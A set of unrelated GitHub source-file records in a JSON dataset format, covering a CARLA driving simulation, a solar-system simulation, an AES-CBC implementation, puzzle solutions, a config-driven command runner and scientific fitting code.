compute_display_static(image):\n\n array = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (image.height, image.width, 4))\n\n array = cv2.cvtColor(array,cv2.COLOR_RGB2BGR)\n\n static_image_pub.publish(bridge.cv2_to_imgmsg(array, \"bgr8\"))\n\n\ndef main():\n global vehicle\n global steer\n global throts\n global camera\n\n pygame.init()\n display_surface = pygame.display.set_mode((300,300))\n pygame.display.set_caption('Keyboard controls')\n clock = pygame.time.Clock()\n \n client = carla.Client('localhost',2000)\n client.set_timeout(20)\n\n world = client.load_world('Town02')\n\n bplib = world.get_blueprint_library()\n vehicle_bp = random.choice(bplib.filter('vehicle.bmw.*'))\n transform = carla.Transform(carla.Location(x=-5,y=250,z=5),carla.Rotation(yaw=270))\n\n vehicle = world.spawn_actor(vehicle_bp,transform)\n\n camera_bp = bplib.find('sensor.camera.rgb')\n camera_bp.set_attribute('image_size_x','800')\n camera_bp.set_attribute('image_size_y','800')\n camera_bp.set_attribute('fov','90')\n \n\n camera_bp_static = bplib.find('sensor.camera.rgb')\n camera_bp_static.set_attribute('image_size_x','800')\n camera_bp_static.set_attribute('image_size_y','800')\n camera_bp_static.set_attribute('fov','90')\n \n \n camera_transform = carla.Transform(carla.Location(x=0,z=2))\n camera = world.spawn_actor(camera_bp,camera_transform, attach_to=vehicle)\n\n camera_static_transform = carla.Transform(carla.Location(x=0,z=1.7))\n\n\n\n camera_static = world.spawn_actor(camera_bp_static,camera_static_transform, attach_to=vehicle)\n \n camera.listen(lambda image: compute_display(image,camera))\n\n\n camera_static.listen(lambda image: compute_display_static(image))\n\n dirr_sub = rospy.Subscriber(\"servo_direction\",Float64,rotate_camera)\n\n \n # vehicle.set_autopilot(True)\n\n while True:\n steer = 0\n throt = 0\n\n pygame.display.flip()\n keys=pygame.key.get_pressed()\n\n if keys[K_w]:\n throt = 0.4\n rev = False\n vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n if keys[K_s]:\n throt = 0.4\n rev = True\n vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n if keys[K_a]:\n steer = -0.5\n vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n if keys[K_d]:\n steer = 0.5\n vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n \n\nif __name__ == '__main__':\n main()","repo_name":"RudeNinja/Multi-View-V-SLAM","sub_path":"Multi-View-V-SLAM-sarat/run_carla.py","file_name":"run_carla.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20828585449","text":"import pyOF as of\n\nclass Car:\n def __init__(self):\n self.acc=0\n self.vel=0\n self.geo = of.ofBoxPrimitive()\n self.material = of.ofMaterial()\n self.lightL = of.ofLight()\n self.lightR = of.ofLight()\n\n def setup(self):\n self.material.setDiffuseColor( of.ofFloatColor.white )\n self.lightL.setParent( self.geo )\n self.lightR.setParent( self.geo )\n self.lightL.move(-45,20, -51)\n self.lightR.move(45, 20, -51)\n self.lightL.tilt(-20)\n self.lightR.tilt(-20)\n self.lightL.setSpotlight()\n self.lightR.setSpotlight()\n self.lightL.setDiffuseColor( of.ofFloatColor.yellow)\n self.lightR.setDiffuseColor( of.ofFloatColor.yellow)\n self.lightL.setup()\n self.lightR.setup()\n\n def draw(self):\n self.material.begin()\n self.geo.draw()\n self.material.end()\n # self.lightR.draw()\n # self.lightL.draw()\n\n def update(self):\n self.vel += self.acc\n self.vel *= 0.9\n self.acc *= 0.99\n velVector = self.geo.getZAxis() * -1*self.vel\n self.geo.move( velVector )\n\n def brake(self):\n self.acc -= 0.1\n def accellerate(self):\n self.acc += 0.1\n def steer(self, dir):\n self.geo.rotate(dir, 0,1,0)\n\nclass App(of.BaseApp):\n def setup(self):\n of.ofSetWindowTitle(\"ofNode Example01\")\n of.ofBackground(80,100,150,255)\n of.ofEnableSmoothing()\n of.ofEnableDepthTest()\n # of.ofEnableAlphaBlending()\n # of.ofSetCircleResolution(50)\n\n self.light1 = of.ofLight()\n self.light1.setup()\n self.light1.setDiffuseColor( of.ofFloatColor.red)\n self.light1.setPosition(-100, 300, 100)\n\n self.light2 = of.ofLight()\n self.light2.setup()\n self.light2.setDiffuseColor( of.ofFloatColor.blue)\n self.light2.setPosition(100, 100, -100)\n\n self.cam = of.ofEasyCam()\n self.plane = of.ofPlanePrimitive()\n self.plane.set(10000, 10000)\n self.plane.rotate(270, 1,0,0)\n self.plane.move(0, -49, 0)\n\n self.roadMaterial = of.ofMaterial()\n self.roadMaterial.setDiffuseColor( of.ofFloatColor.gray )\n self.roadMaterial.setShininess(0.01)\n self.car = Car()\n self.car.setup()\n\n def update(self):\n self.car.update()\n\n def draw(self):\n of.ofBackgroundGradient(of.ofColor.azure, of.ofColor.lightSlateGray, of.OF_GRADIENT_CIRCULAR)\n self.cam.begin()\n self.roadMaterial.begin()\n self.plane.draw()\n self.roadMaterial.end()\n self.car.draw()\n self.cam.end()\n\n\n\napp = App()\napp.runGL(1024, 768, of.OF_WINDOW)","repo_name":"guoguofish/pyOF","sub_path":"build/ofNodeApp.py","file_name":"ofNodeApp.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23177119664","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\n\n# Paramètres de la simulation\nG = 6.67430e-11 # Constante gravitationnelle\ndt = 60 * 60 * 24 # Pas de temps (1 jour en secondes)\nnum_steps = 365 # Nombre d'étapes (1 an)\n\n# Classe représentant un corps céleste\nclass CelestialBody:\n def __init__(self, mass, position, velocity):\n self.mass = mass\n self.position = np.array(position, dtype=float)\n self.velocity = np.array(velocity, dtype=float)\n\n# Initialisation des corps célestes (ex. : Soleil et Terre)\nsun = CelestialBody(mass=1.989e30, position=[0, 0], velocity=[0, 0])\nearth = CelestialBody(mass=5.972e24, position=[1.496e11, 0], velocity=[0, 29783])\nmercury = CelestialBody(mass=3.3011e23, position=[-4.6e10, 0], velocity=[0, -47400])\nvenus = CelestialBody(mass=4.8675e24, position=[-1.07477e11, 0], velocity=[0, -35020])\nmars = CelestialBody(mass=6.4171e23, position=[2.0662e11, 0], velocity=[0, 24007])\njupiter = CelestialBody(mass=1.8982e27, position=[7.4052e11, 0], velocity=[0, 13070])\nsaturn = CelestialBody(mass=5.6834e26, position=[1.35255e12, 0], velocity=[0, 9690])\nuranus = CelestialBody(mass=8.6810e25, position=[2.74130e12, 0], velocity=[0, 6810])\nneptune = CelestialBody(mass=1.02413e26, position=[4.44445e12, 0], velocity=[0, 5430])\n\n# Liste de corps célestes\ncelestial_bodies = [sun, earth, mercury, venus, mars, jupiter, saturn, uranus, neptune]\n\n# Couleurs correspondant à chaque planète\nplanet_colors = {\n \"Soleil\": \"yellow\",\n \"Terre\": \"blue\",\n \"Mercure\": \"gray\",\n \"Vénus\": \"orange\",\n \"Mars\": \"red\",\n \"Jupiter\": \"brown\",\n \"Saturne\": \"gold\",\n \"Uranus\": \"cyan\",\n \"Neptune\": \"blue\"\n}\n\n# Liste des noms de planètes\nplanet_names = list(planet_colors.keys())\n\n# Fonction pour calculer les forces entre les corps\ndef calculate_forces(bodies):\n forces = np.zeros((len(bodies), 2))\n for i, body in enumerate(bodies):\n for j, other_body in enumerate(bodies):\n if i != j:\n displacement = other_body.position - body.position\n distance = np.linalg.norm(displacement)\n force_magnitude = (G * body.mass * other_body.mass) / (distance ** 2)\n force = force_magnitude * (displacement / distance)\n forces[i] += force\n return forces\n\n# Fonction pour mettre à jour les positions et les vitesses\ndef update_positions_and_velocities(bodies, dt):\n forces = calculate_forces(bodies)\n for i, body in enumerate(bodies):\n acceleration = forces[i] / body.mass\n body.velocity += acceleration * dt\n body.position += body.velocity * dt\n\n# Animation\nfig, ax = plt.subplots()\n\ndef animate(frame):\n update_positions_and_velocities(celestial_bodies, dt)\n x = [body.position[0] for body in celestial_bodies]\n y = [body.position[1] for body in celestial_bodies]\n sc.set_offsets(np.c_[x, y])\n\n for name, body in zip(planet_names, celestial_bodies):\n ax.annotate(name, (body.position[0], body.position[1]), color=planet_colors[name], fontsize=8, ha='center')\n\n return sc,\n\nx = [body.position[0] for body in celestial_bodies]\ny = [body.position[1] for body in celestial_bodies]\nsc = ax.scatter(x, y)\n\nax.set_xlim(-3e12, 3e12)\nax.set_ylim(-3e12, 3e12)\nax.set_title(\"Simulation du Système Solaire\")\n\nani = animation.FuncAnimation(fig, animate, frames=num_steps, interval=100, blit=True)\n\n# Afficher une légende avec les couleurs et les noms des planètes\nlegend_handles = [plt.Line2D([0], [0], marker='o', color='w', markerfacecolor=color, markersize=8, label=name) for name, color in planet_colors.items()]\nax.legend(handles=legend_handles, loc='upper left')\n\nplt.show()\n","repo_name":"MarieFlechon/Solar-System-Simulation","sub_path":"solarsystem.py","file_name":"solarsystem.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74529530113","text":"from __future__ import division\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport geffnet\n\nfrom custom.efficientNet.geffnet.activations.activations import Sigmoid\nfrom .. import builder\nfrom ..registry import EFFICIENTPS\nfrom .base import BaseDetector\nfrom custom.mmdet.ops.norm import norm_cfg\n\nimport time\nimport cv2\nimport numpy as np\n\nfrom ...ops import ConvModule\n\n\nclass FeatureFusion(nn.Module):\n def __init__(self, norm_cfg=dict(type='InPlaceABNSync', activation='leaky_relu',\n activation_param=0.01, requires_grad=True)):\n super(FeatureFusion, self).__init__()\n self.in_channels = [296, 320, 432, 2304]\n self.convs = nn.ModuleList()\n for i in range(0, 4):\n self.convs.append(\n ConvModule(\n in_channels=self.in_channels[i],\n out_channels=256,\n kernel_size=3,\n padding=1,\n conv_cfg=None,\n act_cfg=None,\n norm_cfg=norm_cfg))\n\n self.sigmoid = Sigmoid()\n self.conv_1x1 = ConvModule(\n 256,\n 256,\n 1,\n conv_cfg=None,\n act_cfg=None,\n norm_cfg=norm_cfg)\n\n def forward(self, p_s, range_s):\n\n '''\n :param p_s: features from 2 way fpn\n :param range_s: features from REN\n :return: fused features\n '''\n # torch.autograd.set_detect_anomaly(True)\n p_s = list(p_s)\n range_s = list(range_s)\n fused_feats = []\n print(len(p_s), len(range_s), len(self.convs))\n assert len(p_s) == len(range_s) == len(self.convs)\n\n for i in range(len(p_s)):\n # REN and FPN concat at each scale\n fused_feats.append(torch.cat((p_s[i], range_s[i]), dim=1))\n print(len(fused_feats))\n for i in range(len(p_s)):\n print(fused_feats[i].shape)\n z = self.convs[i](fused_feats[i])\n print(z.shape)\n z = self.conv_1x1(z)\n fused_feats[i] = self.sigmoid(z)\n return fused_feats\n\n\n@EFFICIENTPS.register_module\nclass EfficientPS(BaseDetector):\n\n def __init__(self,\n backbone,\n neck=None,\n semantic_head=None,\n shared_head=None,\n pretrained=None):\n assert backbone is not None\n\n super(EfficientPS, self).__init__()\n\n self.eff_backbone_flag = False if 'efficient' not in backbone['type'] else True\n\n print(backbone)\n\n if self.eff_backbone_flag == False:\n self.backbone = builder.build_backbone(backbone)\n else:\n # type = tf_efficientnet_b5\n # scaling coefficient 1.6 2.2 456\n self.backbone = geffnet.create_model(backbone['type'],\n pretrained=True if pretrained is not None else False,\n se=False,\n # type = tf_efficientnet_b5\n act_layer=backbone['act_cfg']['type'],\n norm_layer=norm_cfg[backbone['norm_cfg']['type']][1],\n in_channels=backbone['in_channels'])\n\n print('num_outs', neck['num_outs'])\n self._num_out = neck['num_outs']\n if neck is not None:\n self.neck = builder.build_neck(neck)\n\n if shared_head is not None:\n self.shared_head = builder.build_shared_head(shared_head)\n\n if semantic_head is not None:\n self.semantic_head = builder.build_head(semantic_head)\n\n self.init_weights(pretrained=pretrained)\n\n def init_weights(self, pretrained=None):\n if self.eff_backbone_flag == False:\n self.backbone.init_weights(pretrained=pretrained)\n\n self.neck.init_weights()\n\n if self.with_shared_head:\n self.shared_head.init_weights(pretrained=pretrained)\n # self.semantic_head.init_weights()\n\n def extract_feat(self, img):\n \"\"\"Directly extract features from the backbone+neck\n \"\"\"\n x = self.backbone(img)\n y = self.neck(x)\n return x, y\n\n def forward_train(self, img):\n x, y = self.extract_feat(img)\n semantic = self.semantic_head(y[:self._num_out])\n return x, semantic\n","repo_name":"HannahHaensen/pyfu","sub_path":"custom/mmdet/models/efficientps/efficientPS.py","file_name":"efficientPS.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"23622704711","text":"#!/usr/bin/python4\r\nimport string\r\nfilename = '/Users/sandeepsawant/Data/EclipseWorkspace/Code jam/src/D-large'\r\nobjfile = open('%s.in' % filename, 'r')\r\ncounter = -1\r\nres = []\r\nintNum = 0\r\nfor ln in objfile.readlines():\r\n counter += 1\r\n if not counter:\r\n continue\r\n if not intNum:\r\n intNum = int(ln.replace('\\n', ''))\r\n counter -= 1\r\n continue\r\n ln = ln.replace('\\n', '').split(' ')\r\n intNumSum1 = [int(i) for i in ln]\r\n intNumSum2 = [int(i) for i in ln]\r\n intNumSum2.sort()\r\n intHits = 0\r\n for i in range(0, intNum):\r\n if intNumSum1[i] != intNumSum2[i]:\r\n intHits += 1\r\n res.append('Case #%s: %s' % (counter, intHits))\r\n intNum = 0\r\nobjfile.close()\r\nobjfile = open('/Users/sandeepsawant/Data/EclipseWorkspace/Code jam/src/test.out', 'w')\r\nobjfile.write(string.join(res, '\\n'))\r\nobjfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_77/290.py","file_name":"290.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44869056393","text":"\"\"\"ThreatConnect TI Incident\"\"\"\nfrom ..group import Group\n\n\nclass Incident(Group):\n \"\"\"Unique API calls for Incident API Endpoints\n\n Valid status:\n + Closed\n + Containment Achieved\n + Deleted\n + Incident Reported\n + Open\n + New\n + Rejected\n + Restoration Achieved\n + Stalled\n\n Args:\n tcex (TcEx): An instantiated instance of TcEx object.\n event_date (str, kwargs): The incident event date expression for this Group.\n name (str, kwargs): [Required for Create] The name for this Group.\n status (str, kwargs): The status for this Group.\n \"\"\"\n\n def __init__(self, tcex, **kwargs):\n \"\"\"Initialize Class Properties.\"\"\"\n super().__init__(\n tcex, sub_type='Incident', api_entity='incident', api_branch='incidents', **kwargs\n )\n\n def event_date(self, event_date):\n \"\"\"Update the event_date.\n\n Args:\n event_date: Converted to %Y-%m-%dT%H:%M:%SZ date format.\n\n Returns:\n\n \"\"\"\n if not self.can_update():\n self._tcex.handle_error(910, [self.type])\n\n event_date = self._utils.datetime.format_datetime(\n event_date, date_format='%Y-%m-%dT%H:%M:%SZ'\n )\n self._data['eventDate'] = event_date\n request = {'eventDate': event_date}\n return self.tc_requests.update(self.api_type, self.api_branch, self.unique_id, request)\n\n def status(self, status):\n \"\"\"Update the incidents status\n\n Valid status:\n + Closed\n + Containment Achieved\n + Deleted\n + Incident Reported\n + Open\n + New\n + Rejected\n + Restoration Achieved\n + Stalled\n\n Args:\n status: Closed, Containment Achieved, Deleted, Incident Reported, Open, New, Rejected,\n Restoration Achieved, Stalled.\n\n Returns:\n\n \"\"\"\n if not self.can_update():\n self._tcex.handle_error(910, [self.type])\n\n self._data['status'] = status\n request = {'status': status}\n return self.tc_requests.update(self.api_type, self.api_branch, self.unique_id, request)\n","repo_name":"ThreatConnect-Inc/threatconnect-developer-docs","sub_path":"tcex/tcex/threat_intelligence/mappings/group/group_types/incident.py","file_name":"incident.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"73986813635","text":"#Project Euler problem 3\n\nnum = 600851475143\nsqrt = int(num**0.5)\nprimefactors = {}\n\nfor i in range (2,sqrt):\n while num % i == 0:\n num = num/i\n primefactors[i] = 1\nif num != 1:\n print(num)\nelse:\n print(max(primefactors.keys()))\n\n","repo_name":"yavuzff/Project-Euler","sub_path":"p03.py","file_name":"p03.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"20225336866","text":"import heapq\n# heapq 는 원래 최소힙 제공함\n\nT = int(input())\nfor _ in range(T):\n n = int(input())\n queue = list(map(int, input().split()))\n total = 0\n\n heapq.heapify(queue)\n # queue = []\n # for i in data:\n # heapq.heappush(queue, i)\n while len(queue) > 1:\n x = heapq.heappop(queue)\n y = heapq.heappop(queue)\n\n total += (x+y)\n heapq.heappush(queue, x+y)\n\n print(total)\n","repo_name":"ko509/Weekly-AlgoStudy","sub_path":"1차/3주차/우민지/[13975] 파일합치기3.py","file_name":"[13975] 파일합치기3.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"11216308980","text":"#\n# [55] Jump Game\n#\n# https://leetcode.com/problems/jump-game/description/\n#\n# algorithms\n# Medium (29.57%)\n# Total Accepted: 156.1K\n# Total Submissions: 527.8K\n# Testcase Example: '[2,3,1,1,4]'\n#\n# \n# Given an array of non-negative integers, you are initially positioned at the\n# first index of the array.\n# \n# \n# Each element in the array represents your maximum jump length at that\n# position. \n# \n# \n# Determine if you are able to reach the last index.\n# \n# \n# \n# For example:\n# A = [2,3,1,1,4], return true.\n# \n# \n# A = [3,2,1,0,4], return false.\n# \n#\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n # 5 star. \n step = nums[0]\n for i in range(1, len(nums)):\n if step > 0:\n step -= 1\n step = max(step, nums[i])\n else:\n return False\n return True\n","repo_name":"goalong/lc","sub_path":"v1/55.jump-game.133293052.ac.py","file_name":"55.jump-game.133293052.ac.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"24687436241","text":"\"\"\"\nTODO\n\"\"\"\nimport numpy as _np\n\nfrom .. import ureg as _ureg\n\n\nclass ScatteringModelType(type):\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n return 0.0\n\n\nclass FermiRossi(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n es = 15.0 # MeV\n chi_0 = kwargs[\"material\"].radiation_length.m_as(\"cm\")\n return (es / pv) ** 2 * (1 / chi_0)\n\n\nclass DifferentialHighland(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def length(x, chi0):\n \"\"\"\n\n Args:\n x:\n chi0:\n\n Returns:\n\n \"\"\"\n return x / chi0\n\n @staticmethod\n def f_dh(length):\n \"\"\"\n\n Args:\n length:\n\n Returns:\n\n \"\"\"\n return 0.970 * (1 + (_np.log(length) / 20.7)) * (1 + (_np.log(length) / 22.7))\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n material = kwargs.get(\"material\")\n es = 14.1 # MeV\n chi0 = material.radiation_length.m_as(\"cm\")\n x = material.required_thickness(kinetic_energy_out=pv * _ureg.MeV, kinetic_energy_in=p1v1 * _ureg.MeV).m_as(\n \"cm\",\n )\n return DifferentialHighland.f_dh(DifferentialHighland.length(x, chi0)) * (es / pv) ** 2 * (1 / chi0)\n\n\nclass ICRU(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n pass\n\n\nclass ICRUProtons(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n material = kwargs[\"material\"]\n es = 15.0 # MeV\n chi_s = material.scattering_length.m_as(\"cm\")\n return (es / pv) ** 2 * (1 / chi_s)\n\n\nclass DifferentialMoliere(metaclass=ScatteringModelType):\n \"\"\" \"\"\"\n\n @staticmethod\n def t(pv: float, p1v1: float, **kwargs) -> float:\n \"\"\"\n\n Args:\n pv:\n p1v1:\n **kwargs:\n\n Returns:\n\n \"\"\"\n material = kwargs[\"material\"]\n es = 15.0 # MeV\n chi_s = material.scattering_length.m_as(\"cm\")\n return DifferentialMoliere.f_dm(p1v1, pv) * (es / pv) ** 2 * (1 / chi_s)\n\n @staticmethod\n def f_dm(p1v1: float, pv: float):\n \"\"\"\n\n Args:\n p1v1:\n pv:\n\n Returns:\n\n \"\"\"\n if pv <= 0:\n raise ValueError(\"'pv' must be > 0.\")\n if p1v1 <= 0:\n raise ValueError(\"'p1v1' must be > 0.\")\n if p1v1 <= pv:\n raise ValueError(\"Initial 'p1v1' must be larger than final 'pv'.\")\n return (\n 0.5244\n + 0.1975 * _np.log10(1 - (pv / p1v1) ** 2)\n + 0.2320 * _np.log10(pv)\n - 0.0098 * _np.log10(pv) * _np.log10(1 - (pv / p1v1) ** 2)\n )\n","repo_name":"ULB-Metronu/georges","sub_path":"georges/fermi/mcs.py","file_name":"mcs.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"71178299715","text":"from typing import Literal\n\nfrom davmerger.editor import Editor\n\n\nLAST_CHOICE_FILE = \"\"\nLAST_CHOICE_OUTPUT = \"\"\n\ndef choice_files() -> tuple[str]:\n global LAST_CHOICE_FILE\n\n from tkinter import Tk, filedialog\n Tk().withdraw()\n\n videos: tuple[str] | Literal[''] = filedialog.askopenfilenames(\n title=\"Selecione as gravações\", \n filetypes=(\n (\"Arquivos DAV\", \"*.dav\"), \n (\"Todos os arquivos\", \"*.*\")\n ),\n initialdir=LAST_CHOICE_FILE,\n initialfile=LAST_CHOICE_FILE\n )\n\n if videos:\n LAST_CHOICE_FILE = videos[-1]\n \n if not videos:\n return tuple()\n \n return videos\n\n\ndef ask_output_filename() -> str:\n global LAST_CHOICE_OUTPUT\n\n from tkinter import Tk, filedialog\n Tk().withdraw()\n\n file_path = filedialog.asksaveasfilename(\n defaultextension=\".mp4\",\n filetypes=((\"Vídeos MP4\", \"*.mp4\"), (\"Todos Arquivos\", \"*.*\")),\n title=\"Salvar arquivo como...\",\n initialdir=LAST_CHOICE_OUTPUT,\n initialfile=LAST_CHOICE_OUTPUT\n )\n\n LAST_CHOICE_OUTPUT = file_path\n\n return file_path\n\n\ndef save_video(files: tuple[str], output: str) -> bool:\n try:\n ed = Editor(files)\n ed.save(output, speed_times=64.0)\n except Exception as e:\n print(f\"Falha ao salvar vídeo: {e}\")\n return False\n \n return True\n\n\ndef main():\n all_files: list[dict] = []\n while True:\n files: tuple[str] = choice_files()\n if not files:\n break\n output_file: str = ask_output_filename()\n\n if not output_file:\n print(\"Erro fatal! Escolha um arquivo!!\")\n exit(1)\n \n all_files.append({\n \"files\": files,\n \"output\": output_file\n })\n\n print(all_files[-1])\n\n if not all_files:\n print(\"Erro faltal! Nenhum vídeo selecionado!!\")\n exit(1)\n \n for i, file in enumerate(all_files, start=1):\n print(f\"{i}/{len(all_files)} Renderizando Vídeo:\")\n save_video(file['files'], file['output'])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edvitor13/davmerger","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70969050753","text":"import pyaes\nimport os\n\nfrom tools.time_execution import time_exec\n\ndef random(size=16):\n rand = os.urandom(size)\n return rand\n\n\nclass AES_CBC:\n rounds_by_key_size = {16: 10, 24: 12, 32: 14}\n\n def __init__(self, key, iv):\n assert len(key) in AES_CBC.rounds_by_key_size\n self.iv = [iv[i] for i in range(len(iv))]\n self.aes = pyaes.AES(key)\n\n def strxor_bytes(self, a, b):\n if len(a) > len(b):\n return [(x ^ y) for (x, y) in zip(a[:len(b)], b)]\n else:\n return [(x ^ y) for (x, y) in zip(a, b[:len(a)])]\n\n def PKCS_pad(self, text):\n padding_len = 16 - (len(text) % 16)\n for i in range(padding_len):\n text += chr(padding_len)\n return text\n\n def PKCS_unpad(self, text):\n padding_len = ord(text[-1])\n assert padding_len > 0\n message, padding = text[:-padding_len], text[-padding_len:]\n assert all(ord(p) == padding_len for p in padding)\n return message\n\n def split_16bytes(self, message):\n assert len(message) % 16 == 0\n message_16bytes = [message[i:i + 16] for i in range(0, len(message), 16)]\n return message_16bytes\n\n def encrypt_cbc(self, text):\n iv = self.iv\n text = self.PKCS_pad(text)\n\n blocks = []\n previous = iv.copy()\n\n for text_block in self.split_16bytes(text):\n text_block_bytes = [ord(c) for c in text_block]\n block = self.aes.encrypt(self.strxor_bytes(text_block_bytes, previous))\n blocks.extend(block)\n previous = block\n\n return \"\".join([chr(blocks[i]) for i in range(len(blocks))])\n\n def decrypt_cbc(self, cipher):\n iv = self.iv\n\n blocks = []\n previous = iv.copy()\n\n for cipher_block in self.split_16bytes(cipher):\n cipher_block_bytes = [ord(c) for c in cipher_block]\n block = self.strxor_bytes(previous, self.aes.decrypt(cipher_block_bytes))\n blocks.extend(block)\n previous = cipher_block_bytes\n\n return self.PKCS_unpad(\"\".join([chr(blocks[i]) for i in range(len(blocks))]))\n\n\n@time_exec\ndef aes_cbc(plaintext, key, show=False):\n iv = b'initializationVe'\n\n aes = AES_CBC(key, iv)\n\n ciphertext = aes.encrypt_cbc(plaintext)\n if show:\n print(\"-----------------------------\")\n print('ciphertext AES_CBC:', ciphertext)\n\n decrypted = aes.decrypt_cbc(ciphertext)\n if show:\n print('decrypted by AES_CBC:', decrypted)\n print(\"-----------------------------\\n\")","repo_name":"lipskydan/rc4_salsa20_aes5StreamingModes","sub_path":"AES/aes_cbc.py","file_name":"aes_cbc.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7948830604","text":"#!/usr/bin/env python3\n\nimport toml\nimport click\nimport subprocess\n\n\ndef load_config():\n\twith open('.tbc.toml') as f:\n\t\treturn toml.loads(f.read())\n\ndef execute(config, command):\n\tif command != \"\":\n\t\t# requested\n\t\texecution_key = command\n\telse:\n\t\t# first\n\t\texecution_key = next(iter(config))\n\t\n\texe = config[execution_key]['exe']\n\texecutable_string = str(exe)\n\n\tif 'args' in config[execution_key]:\n\t\targs = config[execution_key]['args']\n\t\targs = [args] if isinstance(args, str) else args\n\t\texecutable_string += ' '\n\t\texecutable_string += ' '.join(args)\n\n\tsubprocess.call(executable_string, shell=True)\n\n@click.command()\n@click.option('--list-commands', is_flag=True, help=\"List available commands\")\n@click.argument('command', default=\"\")\ndef main(command, list_commands):\n\t\"\"\"Tools By Config reads .tbc.toml and executes commands with arguments defined in there.\n\n\tExample .tbc.toml:\n\n\t\\b\n\t[echo]\n\t\texe = \"echo\"\n\t\targs = [\"Hello\", \"World\"]\n\n\tExample launch: `tbc.py echo` or just `tbc.py`\"\"\"\n\tconfig = load_config()\n\tif list_commands:\n\t\tprint('Available options are {cmds}.'.format(cmds=', '.join(list(config.keys()))))\n\t\texit()\n\tif command != \"\" and command not in config:\n\t\tprint(f'{command} can not be found in .tbc.toml')\n\t\tprint('Available options are {cmds}.'.format(cmds=', '.join(list(config.keys()))))\n\telse:\n\t\texecute(config, command)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"AndiH/tools-by-config","sub_path":"tbc.py","file_name":"tbc.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71830201473","text":"from django.test import SimpleTestCase\n\nfrom bennedetto.utils import expand_url_path\n\n\nclass UtilsTestCase(SimpleTestCase):\n def test_expand_url_path(self):\n path = '/test/one/'\n domain = 'test.com:8080'\n\n actual = expand_url_path(path, domain=domain)\n expected = 'test.com:8080/test/one/'\n self.assertEqual(actual, expected)\n\n path = '/test/two/'\n domain = 'test.com'\n\n actual = expand_url_path(path, domain=domain)\n expected = 'test.com/test/two/'\n self.assertEqual(actual, expected)\n","repo_name":"arecker/bennedetto","sub_path":"bennedetto/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"61"} +{"seq_id":"32480449697","text":"def poisson(k, lamb):\n \"\"\"poisson pdf, parameter lamb is the fit parameter\"\"\"\n return (lamb**k/special.factorial(k)) * np.exp(-lamb)\n\n\ndef negLogLikelihood(params, data):\n \"\"\" the negative log-Likelohood-Function\"\"\"\n lnl = - np.sum(np.log(poisson(data, params[0])))\n return lnl\n\n\n# minimize the negative log-Likelihood\nresult = optimize.minimize(negLogLikelihood, x0=[1], args=(data,))\n\nprint(result)\n\n# plot poisson-deviation with fitted parameter\nx_plot = np.linspace(0, 12, 1500)\n\nplt.hist(data.ravel(), 